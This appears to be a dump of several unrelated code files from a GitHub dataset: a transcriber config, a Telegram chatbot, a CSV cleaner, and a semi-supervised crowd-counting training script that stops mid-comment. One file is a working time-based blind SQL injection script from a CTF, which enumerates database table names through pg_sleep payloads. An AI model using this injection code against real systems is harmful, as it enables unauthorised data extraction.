seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
33019978477 | """ Keeps the configuration of the transcriber.
"""
class TranscriberConfig(object):
    """Provide the needed arguments for the transcriber object.

    Attributes:
        model_path: A string, path to the model file to load.
        beam_width: Integer, decoder beam width.
        lm_file_path: A string, path to the language model binary file.
        trie_file_path: A string, path to the trie file built from the same
            vocabulary as the language model binary.
        lm_alpha: A float, alpha hyperparameter of the CTC decoder
            (language model weight).
        lm_beta: A float, beta hyperparameter of the CTC decoder
            (word insertion weight).
    """

    # Constructor arguments copied verbatim onto the instance.
    _FIELDS = ("model_path", "beam_width", "lm_file_path",
               "trie_file_path", "lm_alpha", "lm_beta")

    def __init__(self, model_path, beam_width, lm_file_path, trie_file_path, lm_alpha, lm_beta) -> None:
        provided = locals()
        for field in self._FIELDS:
            setattr(self, field, provided[field])
| ivon99/CSCB634-PythonTranscriber | transcriber/transcriber_config.py | transcriber_config.py | py | 1,047 | python | en | code | 0 | github-code | 90 |
import re
import datetime

from bot import telegram_chatbot

bot = telegram_chatbot("config.cfg")

# BUG FIX: `datetime` was used below without ever being imported, so this
# module crashed with NameError at import time.
Previous_Date = datetime.datetime.today() - datetime.timedelta(days=6)
Previous_Date_Formatted = Previous_Date.strftime('%d/%m/%y')  # format the date to dd/mm/yy
pre_date = str(Previous_Date_Formatted)

# Exported WhatsApp chat log scanned by make_reply() below.
f = open("WhatsApp Chat with s3 - whatsapp summary bot.txt", "r")
def make_reply(msg):
    """Return the first chat-log line mentioning "code" that starts with a digit.

    Args:
        msg: Incoming message text; a reply is produced only when it is not
            None (the content of msg is otherwise ignored).

    Returns:
        The matching line with its 20-character timestamp prefix stripped,
        or None when no line matches.
    """
    reply = None
    if msg is not None:
        # BUG FIX: rescan from the top each call.  Without seek(0) the global
        # file object is exhausted after the first request and every later
        # call silently returned None.
        f.seek(0)
        for x in f:
            if re.search("code", x):
                if re.search("^[0-9]", x):
                    reply = x[20:]
                    break
    return reply
update_id = None
# Long-poll Telegram for updates and answer each incoming message.
while True:
    updates = bot.get_updates(offset=update_id)
    updates = updates["result"]
    if updates:
        for item in updates:
            # Remember the last processed id so the next poll skips it.
            update_id = item["update_id"]
            try:
                message = str(item["message"]["text"])
            # NOTE(review): bare except hides real errors — narrow to KeyError.
            except:
                message = "some exception"
            # NOTE(review): this lookup can raise KeyError for non-message
            # updates (edits, joins); it is outside the try above — confirm.
            from_ = item["message"]["from"]["id"]
            reply = make_reply(message)
            # NOTE(review): arguments are (reply, from_) — confirm this matches
            # telegram_chatbot.send_message's (text, chat_id) signature.
            bot.send_message(reply, from_)
| bhavya4official/telegram-chatbot | server.py | server.py | py | 1,056 | python | en | code | 1 | github-code | 90 |
# BUG FIX: the first line of this script was corrupted by dataset metadata
# fused into the source, making the file unparsable; restored clean code.

# Read the raw export; the with-block guarantees the handle is closed.
with open('editfiles/raw/editfile.csv', 'r') as file:
    content = file.read()
    # print(content)

# Drop the trailing ";END" marker (last 4 characters) and echo the result.
print(content[:-4])
cleaned_content = content[:-4]

# Write the cleaned copy alongside the raw file.
with open('editfiles/edited/editfile_cleaned.csv', 'w') as file:
    file.write(cleaned_content)
34945445354 | # PasteWeb1/table_name.py
import requests
from time import time, sleep
# All printable ASCII characters; candidates for each identifier position.
printable_char = ''
for i in range(33, 127):
    printable_char += chr(i)

# Time-based blind SQL injection (CTF): the payload calls pg_sleep(2) only
# when the guessed prefix of the table name matches, so a response slower
# than 2s confirms the guess.  `offset` walks the public-schema tables of
# information_schema one at a time.
# BUG FIX: the final `offset += 1` line had dataset trailer junk fused onto
# it, which made this file unparsable; restored clean code.
offset = 0
while True:
    cnt = 0
    table_name = ''
    while True:
        cnt += 1
        stop = True
        for c in printable_char:
            sleep(0.1)  # throttle requests against the target
            username = "' or 1=(select 1 from pg_sleep(2) where substr((select \
                table_name from information_schema.tables where table_schema='public' \
                limit 1 offset " + str(offset) + "),1," + str(cnt) + ")='" \
                + table_name + c + "') --"
            current_time = str(int(time()))
            url = 'https://pasteweb.ctf.zoolab.org/'
            data = {
                'username': username,
                'password': '',
                'current_time': current_time
            }
            start_time = time()
            requests.post(url, data=data)
            end_time = time()
            if end_time - start_time > 2:
                # Slow response: character confirmed, extend the prefix.
                table_name += c
                stop = False
                break
        if stop:
            # No candidate matched: the whole name has been recovered.
            break
    print(table_name, cnt)
    if len(table_name) == 0:
        # Empty name at this offset: all tables have been enumerated.
        break
    offset += 1
42948093131 | import pdb
from logger import web_logger
from utils import (AverageMeter, accuracy, create_loss_fn,
save_checkpoint, reduce_tensor, model_load_state_dict)
from models.trans_crowd import base_patch16_384_token, base_patch16_384_gap
from data import DATASET_GETTERS
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
from torch.optim.lr_scheduler import LambdaLR
from torch import optim
from torch.nn import functional as F
from torch import nn
from torch.cuda import amp
import argparse
import logging
import math
import os
import random
import time
import numpy as np
import torch
# NOTE(review): anomaly detection makes autograd dramatically slower; it is a
# debugging aid and probably should not be enabled unconditionally — confirm.
torch.autograd.set_detect_anomaly(True)
# import wandb
# from models.models import WideResNet, ModelEMA
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser()
parser.add_argument('--name', type=str, required=True, help='experiment name')
parser.add_argument('--data_path', default='./data',
type=str, help='data path')
parser.add_argument('--save_path', default='./checkpoint',
type=str, help='save path')
parser.add_argument('--dataset', default='cifar10', type=str,
choices=['cifar10', 'cifar100', 'crowd'], help='dataset name')
parser.add_argument('--num_labeled', type=int, default=4000,
help='number of labeled data')
parser.add_argument("--expand_labels", action="store_true",
help="expand labels to fit eval steps")
parser.add_argument('--total_steps', default=300000,
type=int, help='number of total steps to run')
parser.add_argument('--eval_step', default=1000, type=int,
help='number of eval steps to run')
parser.add_argument('--start_step', default=0, type=int,
help='manual epoch number (useful on restarts)')
parser.add_argument('--workers', default=4, type=int, help='number of workers')
# parser.add_argument('--num-classes', default=10
# type=int, help='number of classes')
parser.add_argument('--resize', default=32, type=int, help='resize image')
parser.add_argument('--batch_size', default=64,
type=int, help='train batch size')
parser.add_argument('--teacher_dropout', default=0,
type=float, help='dropout on last dense layer')
parser.add_argument('--student_dropout', default=0,
type=float, help='dropout on last dense layer')
parser.add_argument('--teacher_lr', default=0.01,
type=float, help='train learning late')
parser.add_argument('--student_lr', default=0.01,
type=float, help='train learning late')
parser.add_argument('--momentum', default=0.9, type=float, help='SGD Momentum')
parser.add_argument('--nesterov', action='store_true', help='use nesterov')
parser.add_argument('--weight_decay', default=0,
type=float, help='train weight decay')
# parser.add_argument('--ema', default=0, type=float, help='EMA decay rate')
parser.add_argument('--warmup_steps', default=0, type=int, help='warmup steps')
parser.add_argument('--student_wait_steps', default=0,
type=int, help='warmup steps')
# parser.add_argument('--grad-clip', default=1e9, type=float,
# help='gradient norm clipping')
parser.add_argument('--grad_clip', default=0., type=float,
help='gradient norm clipping')
parser.add_argument('--resume', default='', type=str,
help='path to checkpoint')
parser.add_argument('--evaluate', action='store_true',
help='only evaluate model on validation set')
parser.add_argument('--finetune', action='store_true',
help='only finetune model on labeled dataset')
parser.add_argument('--finetune_epochs', default=625,
type=int, help='finetune epochs')
parser.add_argument('--finetune_batch_size', default=512,
type=int, help='finetune batch size')
parser.add_argument('--finetune_lr', default=3e-5,
type=float, help='finetune learning late')
parser.add_argument('--finetune_weight_decay', default=0,
type=float, help='finetune weight decay')
parser.add_argument('--finetune_momentum', default=0.9,
type=float, help='finetune SGD Momentum')
parser.add_argument('--seed', default=None, type=int,
help='seed for initializing training')
# parser.add_argument('--label-smoothing', default=0,
# type=float, help='label smoothing alpha')
parser.add_argument('--mu', default=7, type=int,
help='coefficient of unlabeled batch size')
parser.add_argument('--threshold', default=0.95,
type=float, help='pseudo label threshold')
parser.add_argument('--temperature', default=1, type=float,
help='pseudo label temperature')
parser.add_argument('--lambda_u', default=1, type=float,
help='coefficient of unlabeled loss')
parser.add_argument('--uda_steps', default=1, type=float,
help='warmup steps of lambda-u')
parser.add_argument("--randaug", nargs="+", type=int,
help="use it like this. --randaug 2 10")
parser.add_argument("--amp", action="store_true",
help="use 16-bit (mixed) precision")
parser.add_argument('--world_size', default=-1, type=int,
help='number of nodes for distributed training')
parser.add_argument("--local_rank", type=int, default=-1,
help="For distributed training: local_rank")
parser.add_argument('--home', default="", type=str, help='home path')
parser.add_argument('--train_l_data', default="", type=str,
help='labeld data file full path')
parser.add_argument('--train_ul_data', default="", type=str,
help='unlabeld data file full path')
parser.add_argument('--test_l_data', default="", type=str,
help='test data file full path')
# wandb
parser.add_argument("--use_wandb", action="store_true", help="use wandb")
parser.add_argument(
"--project_name", default='2023BigDataProject', type=str, help='project name')
parser.add_argument("--description", default='initial test',
type=str, help='experiment description')
def set_seed(args):
    """Seed every RNG used in training (python, numpy, torch CPU and GPU)."""
    seed = args.seed
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
def get_cosine_schedule_with_warmup(optimizer,
                                    num_warmup_steps,
                                    num_training_steps,
                                    num_wait_steps=0,
                                    num_cycles=0.5,
                                    last_epoch=-1):
    """Cosine learning-rate schedule with an initial wait and linear warmup.

    Phase 1 (step < num_wait_steps): multiplier is 0 (student waits).
    Phase 2 (warmup): multiplier ramps linearly up to 1.
    Phase 3: multiplier follows a cosine decay toward 0 over the remaining
    training steps (clamped at 0 for num_cycles > 0.5).
    """
    warmup_end = num_warmup_steps + num_wait_steps

    def lr_lambda(current_step):
        if current_step < num_wait_steps:
            return 0.0
        if current_step < warmup_end:
            return float(current_step) / float(max(1, warmup_end))
        decay_span = max(1, num_training_steps - warmup_end)
        progress = float(current_step - warmup_end) / float(decay_span)
        cosine = math.cos(math.pi * float(num_cycles) * 2.0 * progress)
        return max(0.0, 0.5 * (1.0 + cosine))

    return LambdaLR(optimizer, lr_lambda, last_epoch)
def get_lr(optimizer):
    """Return the learning rate of the optimizer's first parameter group."""
    first_group = optimizer.param_groups[0]
    return first_group["lr"]
def check_nan_parameters(model):
    """Print a warning for every parameter tensor of *model* containing NaNs."""
    nan_names = (name for name, param in model.named_parameters()
                 if torch.isnan(param).any())
    for name in nan_names:
        print(f"============ NaN parameter found in {name}")
def train_loop(args, labeled_loader, unlabeled_loader, test_loader, finetune_dataset,
               teacher_model, student_model, avg_student_model, criterion,
               t_optimizer, s_optimizer, t_scheduler, s_scheduler, t_scaler, s_scaler):
    """Meta Pseudo Labels (MPL) training loop.

    Per step:
      1. The teacher forwards the labeled batch plus weakly/strongly
         augmented views of an unlabeled batch.
      2. The student trains on the teacher's weak-view outputs used as
         pseudo targets for the strong view.
      3. The teacher is updated with a UDA-style loss plus an MPL feedback
         term proportional to the change in the student's labeled loss.
    Every ``args.eval_step`` steps the student is evaluated and the best
    checkpoint is saved; afterwards the best student is finetuned on the
    labeled set.
    """
    logger.info("***** Running Training *****")
    logger.info(f" Task = {args.dataset}@{args.num_labeled}")
    logger.info(f" Total steps = {args.total_steps}")
    if args.world_size > 1:
        labeled_epoch = 0
        unlabeled_epoch = 0
        labeled_loader.sampler.set_epoch(labeled_epoch)
        unlabeled_loader.sampler.set_epoch(unlabeled_epoch)
    labeled_iter = iter(labeled_loader)
    unlabeled_iter = iter(unlabeled_loader)
    for step in range(args.start_step, args.total_steps):
        # Fresh progress bar and loss meters at each eval-window boundary.
        # NOTE(review): if args.start_step is not a multiple of eval_step,
        # pbar and the meters are used before being created — confirm resume.
        if step % args.eval_step == 0:
            pbar = tqdm(range(args.eval_step),
                        disable=args.local_rank not in [-1, 0])
            batch_time = AverageMeter()
            data_time = AverageMeter()
            s_losses = AverageMeter()
            t_losses = AverageMeter()
            t_losses_l = AverageMeter()
            t_losses_u = AverageMeter()
            t_losses_mpl = AverageMeter()
            # mean_mask = AverageMeter()
        teacher_model.train()
        student_model.train()
        end = time.time()
        # Next labeled batch; restart the iterator when the epoch ends.
        try:
            images_l, targets = next(labeled_iter)
        except:
            if args.world_size > 1:
                labeled_epoch += 1
                labeled_loader.sampler.set_epoch(labeled_epoch)
            labeled_iter = iter(labeled_loader)
            images_l, targets = next(labeled_iter)
        # (B,) -> (B, 1) so targets line up with the model's scalar output.
        targets = targets.unsqueeze(1)
        # Next unlabeled batch: (weakly augmented, strongly augmented) views.
        try:
            (images_uw, images_us), _ = next(unlabeled_iter)
        except:
            if args.world_size > 1:
                unlabeled_epoch += 1
                unlabeled_loader.sampler.set_epoch(unlabeled_epoch)
            unlabeled_iter = iter(unlabeled_loader)
            (images_uw, images_us), _ = next(unlabeled_iter)
        data_time.update(time.time() - end)
        images_l = images_l.to(args.device)
        images_uw = images_uw.to(args.device)
        images_us = images_us.to(args.device)
        targets = targets.to(args.device)
        with amp.autocast(enabled=args.amp):
            batch_size = images_l.shape[0]
            # Single teacher forward over labeled + weak + strong batches.
            t_images = torch.cat((images_l, images_uw, images_us))
            t_logits = teacher_model(t_images)
            t_logits_l = t_logits[:batch_size]
            t_logits_uw, t_logits_us = t_logits[batch_size:].chunk(2)
            del t_logits
            # Supervised loss + consistency between the two unlabeled views.
            t_loss_l = criterion(t_logits_l, targets)
            t_loss_u = criterion(t_logits_us, t_logits_uw.detach())
            # Unlabeled weight ramps linearly up over args.uda_steps.
            weight_u = args.lambda_u * min(1., (step + 1) / args.uda_steps)
            t_loss_uda = t_loss_l + weight_u * t_loss_u
            # Student forward on labeled + strongly augmented unlabeled.
            s_images = torch.cat((images_l, images_us))
            s_logits = student_model(s_images)
            s_logits_l = s_logits[:batch_size]
            s_logits_us = s_logits[batch_size:]
            del s_logits
            # Labeled loss BEFORE the student update (MPL reference point).
            s_loss_l_old = criterion(s_logits_l.detach(), targets)
            # Student trains on the teacher's weak-view outputs as targets.
            s_loss = criterion(s_logits_us, t_logits_uw.detach())
        s_scaler.scale(s_loss).backward()
        if args.grad_clip > 0:
            s_scaler.unscale_(s_optimizer)
            nn.utils.clip_grad_norm_(
                student_model.parameters(), args.grad_clip)
        s_scaler.step(s_optimizer)
        s_scaler.update()
        s_scheduler.step()
        # if args.ema > 0:
        #     avg_student_model.update_parameters(student_model)
        with amp.autocast(enabled=args.amp):
            with torch.no_grad():
                s_logits_l = student_model(images_l)
            # Labeled loss AFTER the update; the difference is a first-order
            # proxy for how helpful the teacher's pseudo labels were.
            s_loss_l_new = criterion(s_logits_l.detach(), targets)
            dot_product = s_loss_l_new - s_loss_l_old
            t_loss_mpl = dot_product * \
                criterion(t_logits_us, t_logits_uw.detach())
            t_loss = t_loss_uda + t_loss_mpl
        t_scaler.scale(t_loss).backward()
        if args.grad_clip > 0:
            t_scaler.unscale_(t_optimizer)
            nn.utils.clip_grad_norm_(
                teacher_model.parameters(), args.grad_clip)
        t_scaler.step(t_optimizer)
        t_scaler.update()
        t_scheduler.step()
        teacher_model.zero_grad()
        student_model.zero_grad()
        # Average the logged losses across workers when distributed.
        if args.world_size > 1:
            s_loss = reduce_tensor(s_loss.detach(), args.world_size)
            t_loss = reduce_tensor(t_loss.detach(), args.world_size)
            t_loss_l = reduce_tensor(t_loss_l.detach(), args.world_size)
            t_loss_u = reduce_tensor(t_loss_u.detach(), args.world_size)
            t_loss_mpl = reduce_tensor(t_loss_mpl.detach(), args.world_size)
            # mask = reduce_tensor(mask, args.world_size)
        s_losses.update(s_loss.item())
        t_losses.update(t_loss.mean().item())
        t_losses_l.update(t_loss_l.item())
        t_losses_u.update(t_loss_u.mean().item())
        t_losses_mpl.update(t_loss_mpl.item())
        # mean_mask.update(mask.mean().item())
        batch_time.update(time.time() - end)
        pbar.set_description(
            f"Train Iter: {step+1:3}/{args.total_steps:3}. "
            f"LR: {get_lr(s_optimizer):.4f}. Data: {data_time.avg:.2f}s. "
            f"Batch: {batch_time.avg:.2f}s. S_Loss: {s_losses.avg:.4f}. "
            f"T_Loss: {t_losses.avg:.4f}. ")
        pbar.update()
        if args.local_rank in [-1, 0]:
            args.writer.add_scalar("lr", get_lr(s_optimizer), step)
            web_logger.log(args, {"lr": get_lr(s_optimizer)})
            # wandb.log({"lr": get_lr(s_optimizer)})
        args.num_eval = step // args.eval_step
        # print(f"{step+1} {args.eval_step} {(step + 1) % args.eval_step}")
        # End of an eval window: log window averages, evaluate, checkpoint.
        if (step + 1) % args.eval_step == 0:
            pbar.close()
            if args.local_rank in [-1, 0]:
                print("==================logging")
                args.writer.add_scalar(
                    "train/1.s_loss", s_losses.avg, args.num_eval)
                args.writer.add_scalar(
                    "train/2.t_loss", t_losses.avg, args.num_eval)
                args.writer.add_scalar(
                    "train/3.t_labeled", t_losses_l.avg, args.num_eval)
                args.writer.add_scalar(
                    "train/4.t_unlabeled", t_losses_u.avg, args.num_eval)
                args.writer.add_scalar(
                    "train/5.t_mpl", t_losses_mpl.avg, args.num_eval)
                web_logger.log(args,
                               {"train/1.s_loss": s_losses.avg})
                web_logger.log(args,
                               {"train/2.t_loss": t_losses.avg})
                web_logger.log(args,
                               {"train/3.t_labeled": t_losses_l.avg})
                web_logger.log(args,
                               {"train/4.t_unlabeled": t_losses_u.avg})
                web_logger.log(args,
                               {"train/5.t_mpl": t_losses_mpl.avg})
                test_model = avg_student_model if avg_student_model is not None else student_model
                test_loss = evaluate(
                    args, test_loader, test_model, criterion)
                # NOTE(review): the test loss is written twice to both the
                # SummaryWriter and web_logger below — looks like a
                # copy/paste duplication.
                args.writer.add_scalar("test/loss", test_loss, args.num_eval)
                args.writer.add_scalar(
                    "test/loss", test_loss, args.num_eval)
                web_logger.log(args, {"test/loss": test_loss})
                web_logger.log(args,
                               {"test/loss": test_loss})
                is_best = test_loss < args.best_loss
                if is_best:
                    args.best_loss = test_loss
                logger.info(f"loss: {test_loss:.2f}")
                logger.info(f"best_loss: {args.best_loss:.2f}")
                save_checkpoint(args, {
                    'step': step + 1,
                    'teacher_state_dict': teacher_model.state_dict(),
                    'student_state_dict': student_model.state_dict(),
                    'avg_state_dict': avg_student_model.state_dict() if avg_student_model is not None else None,
                    'best_loss': args.best_loss,
                    'teacher_optimizer': t_optimizer.state_dict(),
                    'student_optimizer': s_optimizer.state_dict(),
                    'teacher_scheduler': t_scheduler.state_dict(),
                    'student_scheduler': s_scheduler.state_dict(),
                    'teacher_scaler': t_scaler.state_dict(),
                    'student_scaler': s_scaler.state_dict(),
                }, is_best)
    if args.local_rank in [-1, 0]:
        args.writer.add_scalar("result/test_loss", args.best_loss)
        web_logger.log(args, {"result/test_loss": args.best_loss})
        # wandb.log({"result/test_acc@1": args.best_top1})
    # finetune: free the teacher-side objects, reload the best student
    # weights from the checkpoint, then finetune on the labeled set.
    del t_scaler, t_scheduler, t_optimizer, teacher_model, labeled_loader, unlabeled_loader
    del s_scaler, s_scheduler, s_optimizer
    ckpt_name = f'{args.save_path}/{args.name}_best.pth.tar'
    loc = f'cuda:{args.gpu}'
    checkpoint = torch.load(ckpt_name, map_location=loc)
    logger.info(f"=> loading checkpoint '{ckpt_name}'")
    if checkpoint['avg_state_dict'] is not None:
        model_load_state_dict(student_model, checkpoint['avg_state_dict'])
    else:
        model_load_state_dict(student_model, checkpoint['student_state_dict'])
    finetune(args, finetune_dataset, test_loader, student_model, criterion)
    return
# ref: see the paper for the evaluation protocol
def evaluate(args, test_loader, model, criterion):
    """Run the model over ``test_loader`` and return the average loss.

    The predicted crowd count is taken as the sum of the model's output
    map; the loss is computed between that scalar count and the target.
    """
    batch_time = AverageMeter()
    data_time = AverageMeter()
    losses = AverageMeter()
    model.eval()
    test_iter = tqdm(test_loader, disable=args.local_rank not in [-1, 0])
    with torch.no_grad():
        end = time.time()
        for step, (images, targets) in enumerate(test_iter):
            # Normalize batch rank: 5-D input drops its leading dim, a 3-D
            # single image gains a batch dim, so the model always sees 4-D.
            if len(images.shape) == 5:
                images = images.squeeze(0)
            if len(images.shape) == 3:
                images = images.unsqueeze(0)
            images = images.float()
            targets = targets.float()
            data_time.update(time.time() - end)
            batch_size = images.shape[0]
            images = images.to(args.device)
            targets = targets.to(args.device)
            with amp.autocast(enabled=args.amp):
                outputs = model(images)
                # Scalar predicted count = sum over the output map; wrapping
                # it in a fresh tensor is fine here since we are under
                # no_grad and only need the loss value.
                count = torch.sum(outputs).item()
                loss = criterion(torch.tensor(
                    count).to(targets.device), targets)
            # acc1, acc5 = accuracy(outputs, targets, (1, 5))  # wycho
            losses.update(loss.item(), batch_size)
            # pred.update(pred[0], batch_size)
            batch_time.update(time.time() - end)
            end = time.time()
            test_iter.set_description(
                f"Test Iter: {step+1:3}/{len(test_loader):3}. Data: {data_time.avg:.2f}s. "
                f"Batch: {batch_time.avg:.2f}s. Loss: {losses.avg:.4f}. ")
        test_iter.close()
        return losses.avg
def finetune(args, finetune_dataset, test_loader, model, criterion):
    """Supervised finetuning of ``model`` on the labeled finetune set.

    Trains for args.finetune_epochs with Adam, evaluates after every epoch,
    and checkpoints whenever the test loss improves on args.best_loss.
    """
    # Replace the model's dropout layer with a no-op for finetuning.
    # NOTE(review): assumes the model exposes a ``drop`` submodule — confirm.
    model.drop = nn.Identity()
    # NOTE(review): train_sampler is computed but never used; the DataLoader
    # below always runs with its default sampler, even in distributed mode.
    train_sampler = RandomSampler if args.local_rank == -1 else DistributedSampler
    labeled_loader = DataLoader(
        finetune_dataset,
        batch_size=args.finetune_batch_size,
        num_workers=args.workers,
        pin_memory=True)
    # optimizer = optim.SGD(model.parameters(),
    #                       lr=args.finetune_lr,
    #                       momentum=args.finetune_momentum,
    #                       weight_decay=args.finetune_weight_decay,
    #                       nesterov=True)
    optimizer = torch.optim.Adam(model.parameters(), lr=args.finetune_lr)
    scaler = amp.GradScaler(enabled=args.amp)

    logger.info("***** Running Finetuning *****")
    logger.info(
        f" Finetuning steps = {len(labeled_loader)*args.finetune_epochs}")

    for epoch in range(args.finetune_epochs):
        if args.world_size > 1:
            # NOTE(review): magic offset 624 decorrelates shuffling from the
            # main-training epochs — confirm the intent (and see the unused
            # sampler note above; set_epoch may not apply here at all).
            labeled_loader.sampler.set_epoch(epoch + 624)
        batch_time = AverageMeter()
        data_time = AverageMeter()
        losses = AverageMeter()
        model.train()
        end = time.time()
        labeled_iter = tqdm(
            labeled_loader, disable=args.local_rank not in [-1, 0])
        for step, (images, targets) in enumerate(labeled_iter):
            images = images.float()
            targets = targets.float()
            data_time.update(time.time() - end)
            batch_size = images.shape[0]
            images = images.to(args.device)
            targets = targets.to(args.device)
            with amp.autocast(enabled=args.amp):
                model.zero_grad()
                outputs = model(images)
                loss = criterion(outputs, targets)
            scaler.scale(loss).backward()
            scaler.step(optimizer)
            scaler.update()
            if args.world_size > 1:
                loss = reduce_tensor(loss.detach(), args.world_size)
            losses.update(loss.item(), batch_size)
            batch_time.update(time.time() - end)
            labeled_iter.set_description(
                f"Finetune Epoch: {epoch+1:2}/{args.finetune_epochs:2}. Data: {data_time.avg:.2f}s. "
                f"Batch: {batch_time.avg:.2f}s. Loss: {losses.avg:.4f}. ")
        labeled_iter.close()
        # Per-epoch evaluation and best-loss checkpointing on rank 0.
        if args.local_rank in [-1, 0]:
            args.writer.add_scalar("finetune/train_loss", losses.avg, epoch)
            test_loss = evaluate(
                args, test_loader, model, criterion)
            args.writer.add_scalar("finetune/test_loss", test_loss, epoch)
            web_logger.log(args, {"finetune/train_loss": losses.avg})
            web_logger.log(args, {"finetune/test_loss": test_loss})
            is_best = test_loss < args.best_loss
            if is_best:
                args.best_loss = test_loss
            logger.info(f"loss: {test_loss:.2f}")
            logger.info(f"best_loss: {args.best_loss:.2f}")
            save_checkpoint(args, {
                'step': step + 1,
                'best_loss': args.best_loss,
                'student_state_dict': model.state_dict(),
                'avg_state_dict': None,
                'student_optimizer': optimizer.state_dict(),
            }, is_best, finetune=True)
    if args.local_rank in [-1, 0]:
        args.writer.add_scalar("result/finetune_loss", args.best_loss)
        web_logger.log(args, {"result/finetune_loss": args.best_loss})
        # wandb.log({"result/finetune_acc@1": args.best_top1})
    return
def main():
    """Entry point.

    Parses CLI arguments, sets up (optionally distributed) devices, builds
    datasets/loaders and the teacher/student TransCrowd models, restores a
    checkpoint if requested, then dispatches to finetuning, evaluation, or
    the full MPL training loop.
    """
    args = parser.parse_args()
    args.best_loss = float('inf')

    # Distributed setup: local_rank >= 0 means we were started by a
    # distributed launcher; otherwise run single-process on GPU 0.
    if args.local_rank != -1:
        args.gpu = args.local_rank
        torch.distributed.init_process_group(backend='nccl')
        args.world_size = torch.distributed.get_world_size()
    else:
        args.gpu = 0
        args.world_size = 1

    if args.local_rank in [-1, 0]:
        # Timestamp (MMDDhhmmss) used to tag this run.
        args.local_time = f"{time.localtime().tm_mon:02d}{time.localtime().tm_mday:02d}{time.localtime().tm_hour:02d}{time.localtime().tm_min:02d}{time.localtime().tm_sec:02d}"

    args.device = torch.device('cuda', args.gpu)

    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        datefmt="%m/%d/%Y %H:%M:%S",
        level=logging.INFO if args.local_rank in [-1, 0] else logging.WARNING)

    logger.warning(
        f"Process rank: {args.local_rank}, "
        f"device: {args.device}, "
        f"distributed training: {bool(args.local_rank != -1)}, "
        f"16-bits training: {args.amp}")

    logger.info(dict(args._get_kwargs()))

    if args.local_rank in [-1, 0]:
        args.writer = SummaryWriter(f"results/{args.name}")
        # wandb.init(name=args.name, project='MPL', config=args)

    if args.seed is not None:
        set_seed(args)

    # Rank 0 builds/caches the datasets first; other ranks wait at the
    # barrier, then read the cached data.
    if args.local_rank not in [-1, 0]:
        torch.distributed.barrier()

    labeled_dataset, unlabeled_dataset, test_dataset, finetune_dataset = DATASET_GETTERS[args.dataset](
        args)

    if args.local_rank == 0:
        torch.distributed.barrier()

    train_sampler = RandomSampler if args.local_rank == -1 else DistributedSampler
    labeled_loader = DataLoader(
        labeled_dataset,
        sampler=train_sampler(labeled_dataset),
        batch_size=args.batch_size,
        num_workers=args.workers,
        drop_last=True)

    unlabeled_loader = DataLoader(
        unlabeled_dataset,
        sampler=train_sampler(unlabeled_dataset),
        batch_size=args.batch_size * args.mu,
        num_workers=args.workers,
        drop_last=True)

    test_loader = DataLoader(test_dataset,
                             sampler=SequentialSampler(test_dataset),
                             batch_size=1,
                             num_workers=args.workers)

    # Legacy WideResNet sizing kept for reference; unused by the ViT models
    # constructed below.
    if args.dataset == "cifar10":
        depth, widen_factor = 28, 2
    elif args.dataset == 'cifar100':
        depth, widen_factor = 28, 8
    else:
        depth, widen_factor = 28, 2  # wycho: placeholder, needs revisiting

    if args.local_rank not in [-1, 0]:
        torch.distributed.barrier()

    # Teacher and student share the same TransCrowd (ViT, token head)
    # architecture, both starting from pretrained weights.
    teacher_model = base_patch16_384_token(pretrained=True)
    student_model = base_patch16_384_token(pretrained=True)

    if args.local_rank == 0:
        torch.distributed.barrier()

    logger.info(
        f"Params: {sum(p.numel() for p in teacher_model.parameters())/1e6:.2f}M")

    avg_student_model = None
    # if args.ema > 0:
    #     avg_student_model = ModelEMA(student_model, args.ema)

    criterion = create_loss_fn(args)

    t_optimizer = torch.optim.Adam(
        [
            {'params': teacher_model.parameters(), 'lr': args.teacher_lr},
        ], lr=args.teacher_lr, weight_decay=args.weight_decay)
    # BUG FIX: s_optimizer previously received teacher_model.parameters(),
    # so the student network was never updated by its optimizer at all.
    s_optimizer = torch.optim.Adam(
        [
            {'params': student_model.parameters(), 'lr': args.student_lr},
        ], lr=args.student_lr, weight_decay=args.weight_decay)

    t_scheduler = get_cosine_schedule_with_warmup(t_optimizer,
                                                  args.warmup_steps,
                                                  args.total_steps)
    s_scheduler = get_cosine_schedule_with_warmup(s_optimizer,
                                                  args.warmup_steps,
                                                  args.total_steps,
                                                  args.student_wait_steps)

    t_scaler = amp.GradScaler(enabled=args.amp)
    s_scaler = amp.GradScaler(enabled=args.amp)

    # Optionally resume from a checkpoint.
    if args.resume:
        if os.path.isfile(args.resume):
            logger.info(f"=> loading checkpoint '{args.resume}'")
            loc = f'cuda:{args.gpu}'
            checkpoint = torch.load(args.resume, map_location=loc)
            # NOTE(review): save_checkpoint stores 'best_loss' as a plain
            # float, in which case .to() would raise — confirm checkpoints.
            args.best_loss = checkpoint['best_loss'].to(torch.device('cpu'))
            if not (args.evaluate or args.finetune):
                args.start_step = checkpoint['step']
                t_optimizer.load_state_dict(checkpoint['teacher_optimizer'])
                s_optimizer.load_state_dict(checkpoint['student_optimizer'])
                t_scheduler.load_state_dict(checkpoint['teacher_scheduler'])
                s_scheduler.load_state_dict(checkpoint['student_scheduler'])
                t_scaler.load_state_dict(checkpoint['teacher_scaler'])
                s_scaler.load_state_dict(checkpoint['student_scaler'])
                model_load_state_dict(
                    teacher_model, checkpoint['teacher_state_dict'])
                if avg_student_model is not None:
                    model_load_state_dict(
                        avg_student_model, checkpoint['avg_state_dict'])
            else:
                # Finetune/evaluate paths only need the student weights
                # (preferring the EMA weights when present).
                if checkpoint['avg_state_dict'] is not None:
                    model_load_state_dict(
                        student_model, checkpoint['avg_state_dict'])
                else:
                    model_load_state_dict(
                        student_model, checkpoint['student_state_dict'])
            logger.info(
                f"=> loaded checkpoint '{args.resume}' (step {checkpoint['step']})")
        else:
            logger.info(f"=> no checkpoint found at '{args.resume}'")

    # NOTE(review): DDP wrapping happens before the models are moved to
    # args.device (below), and the finetune/evaluate branches run on models
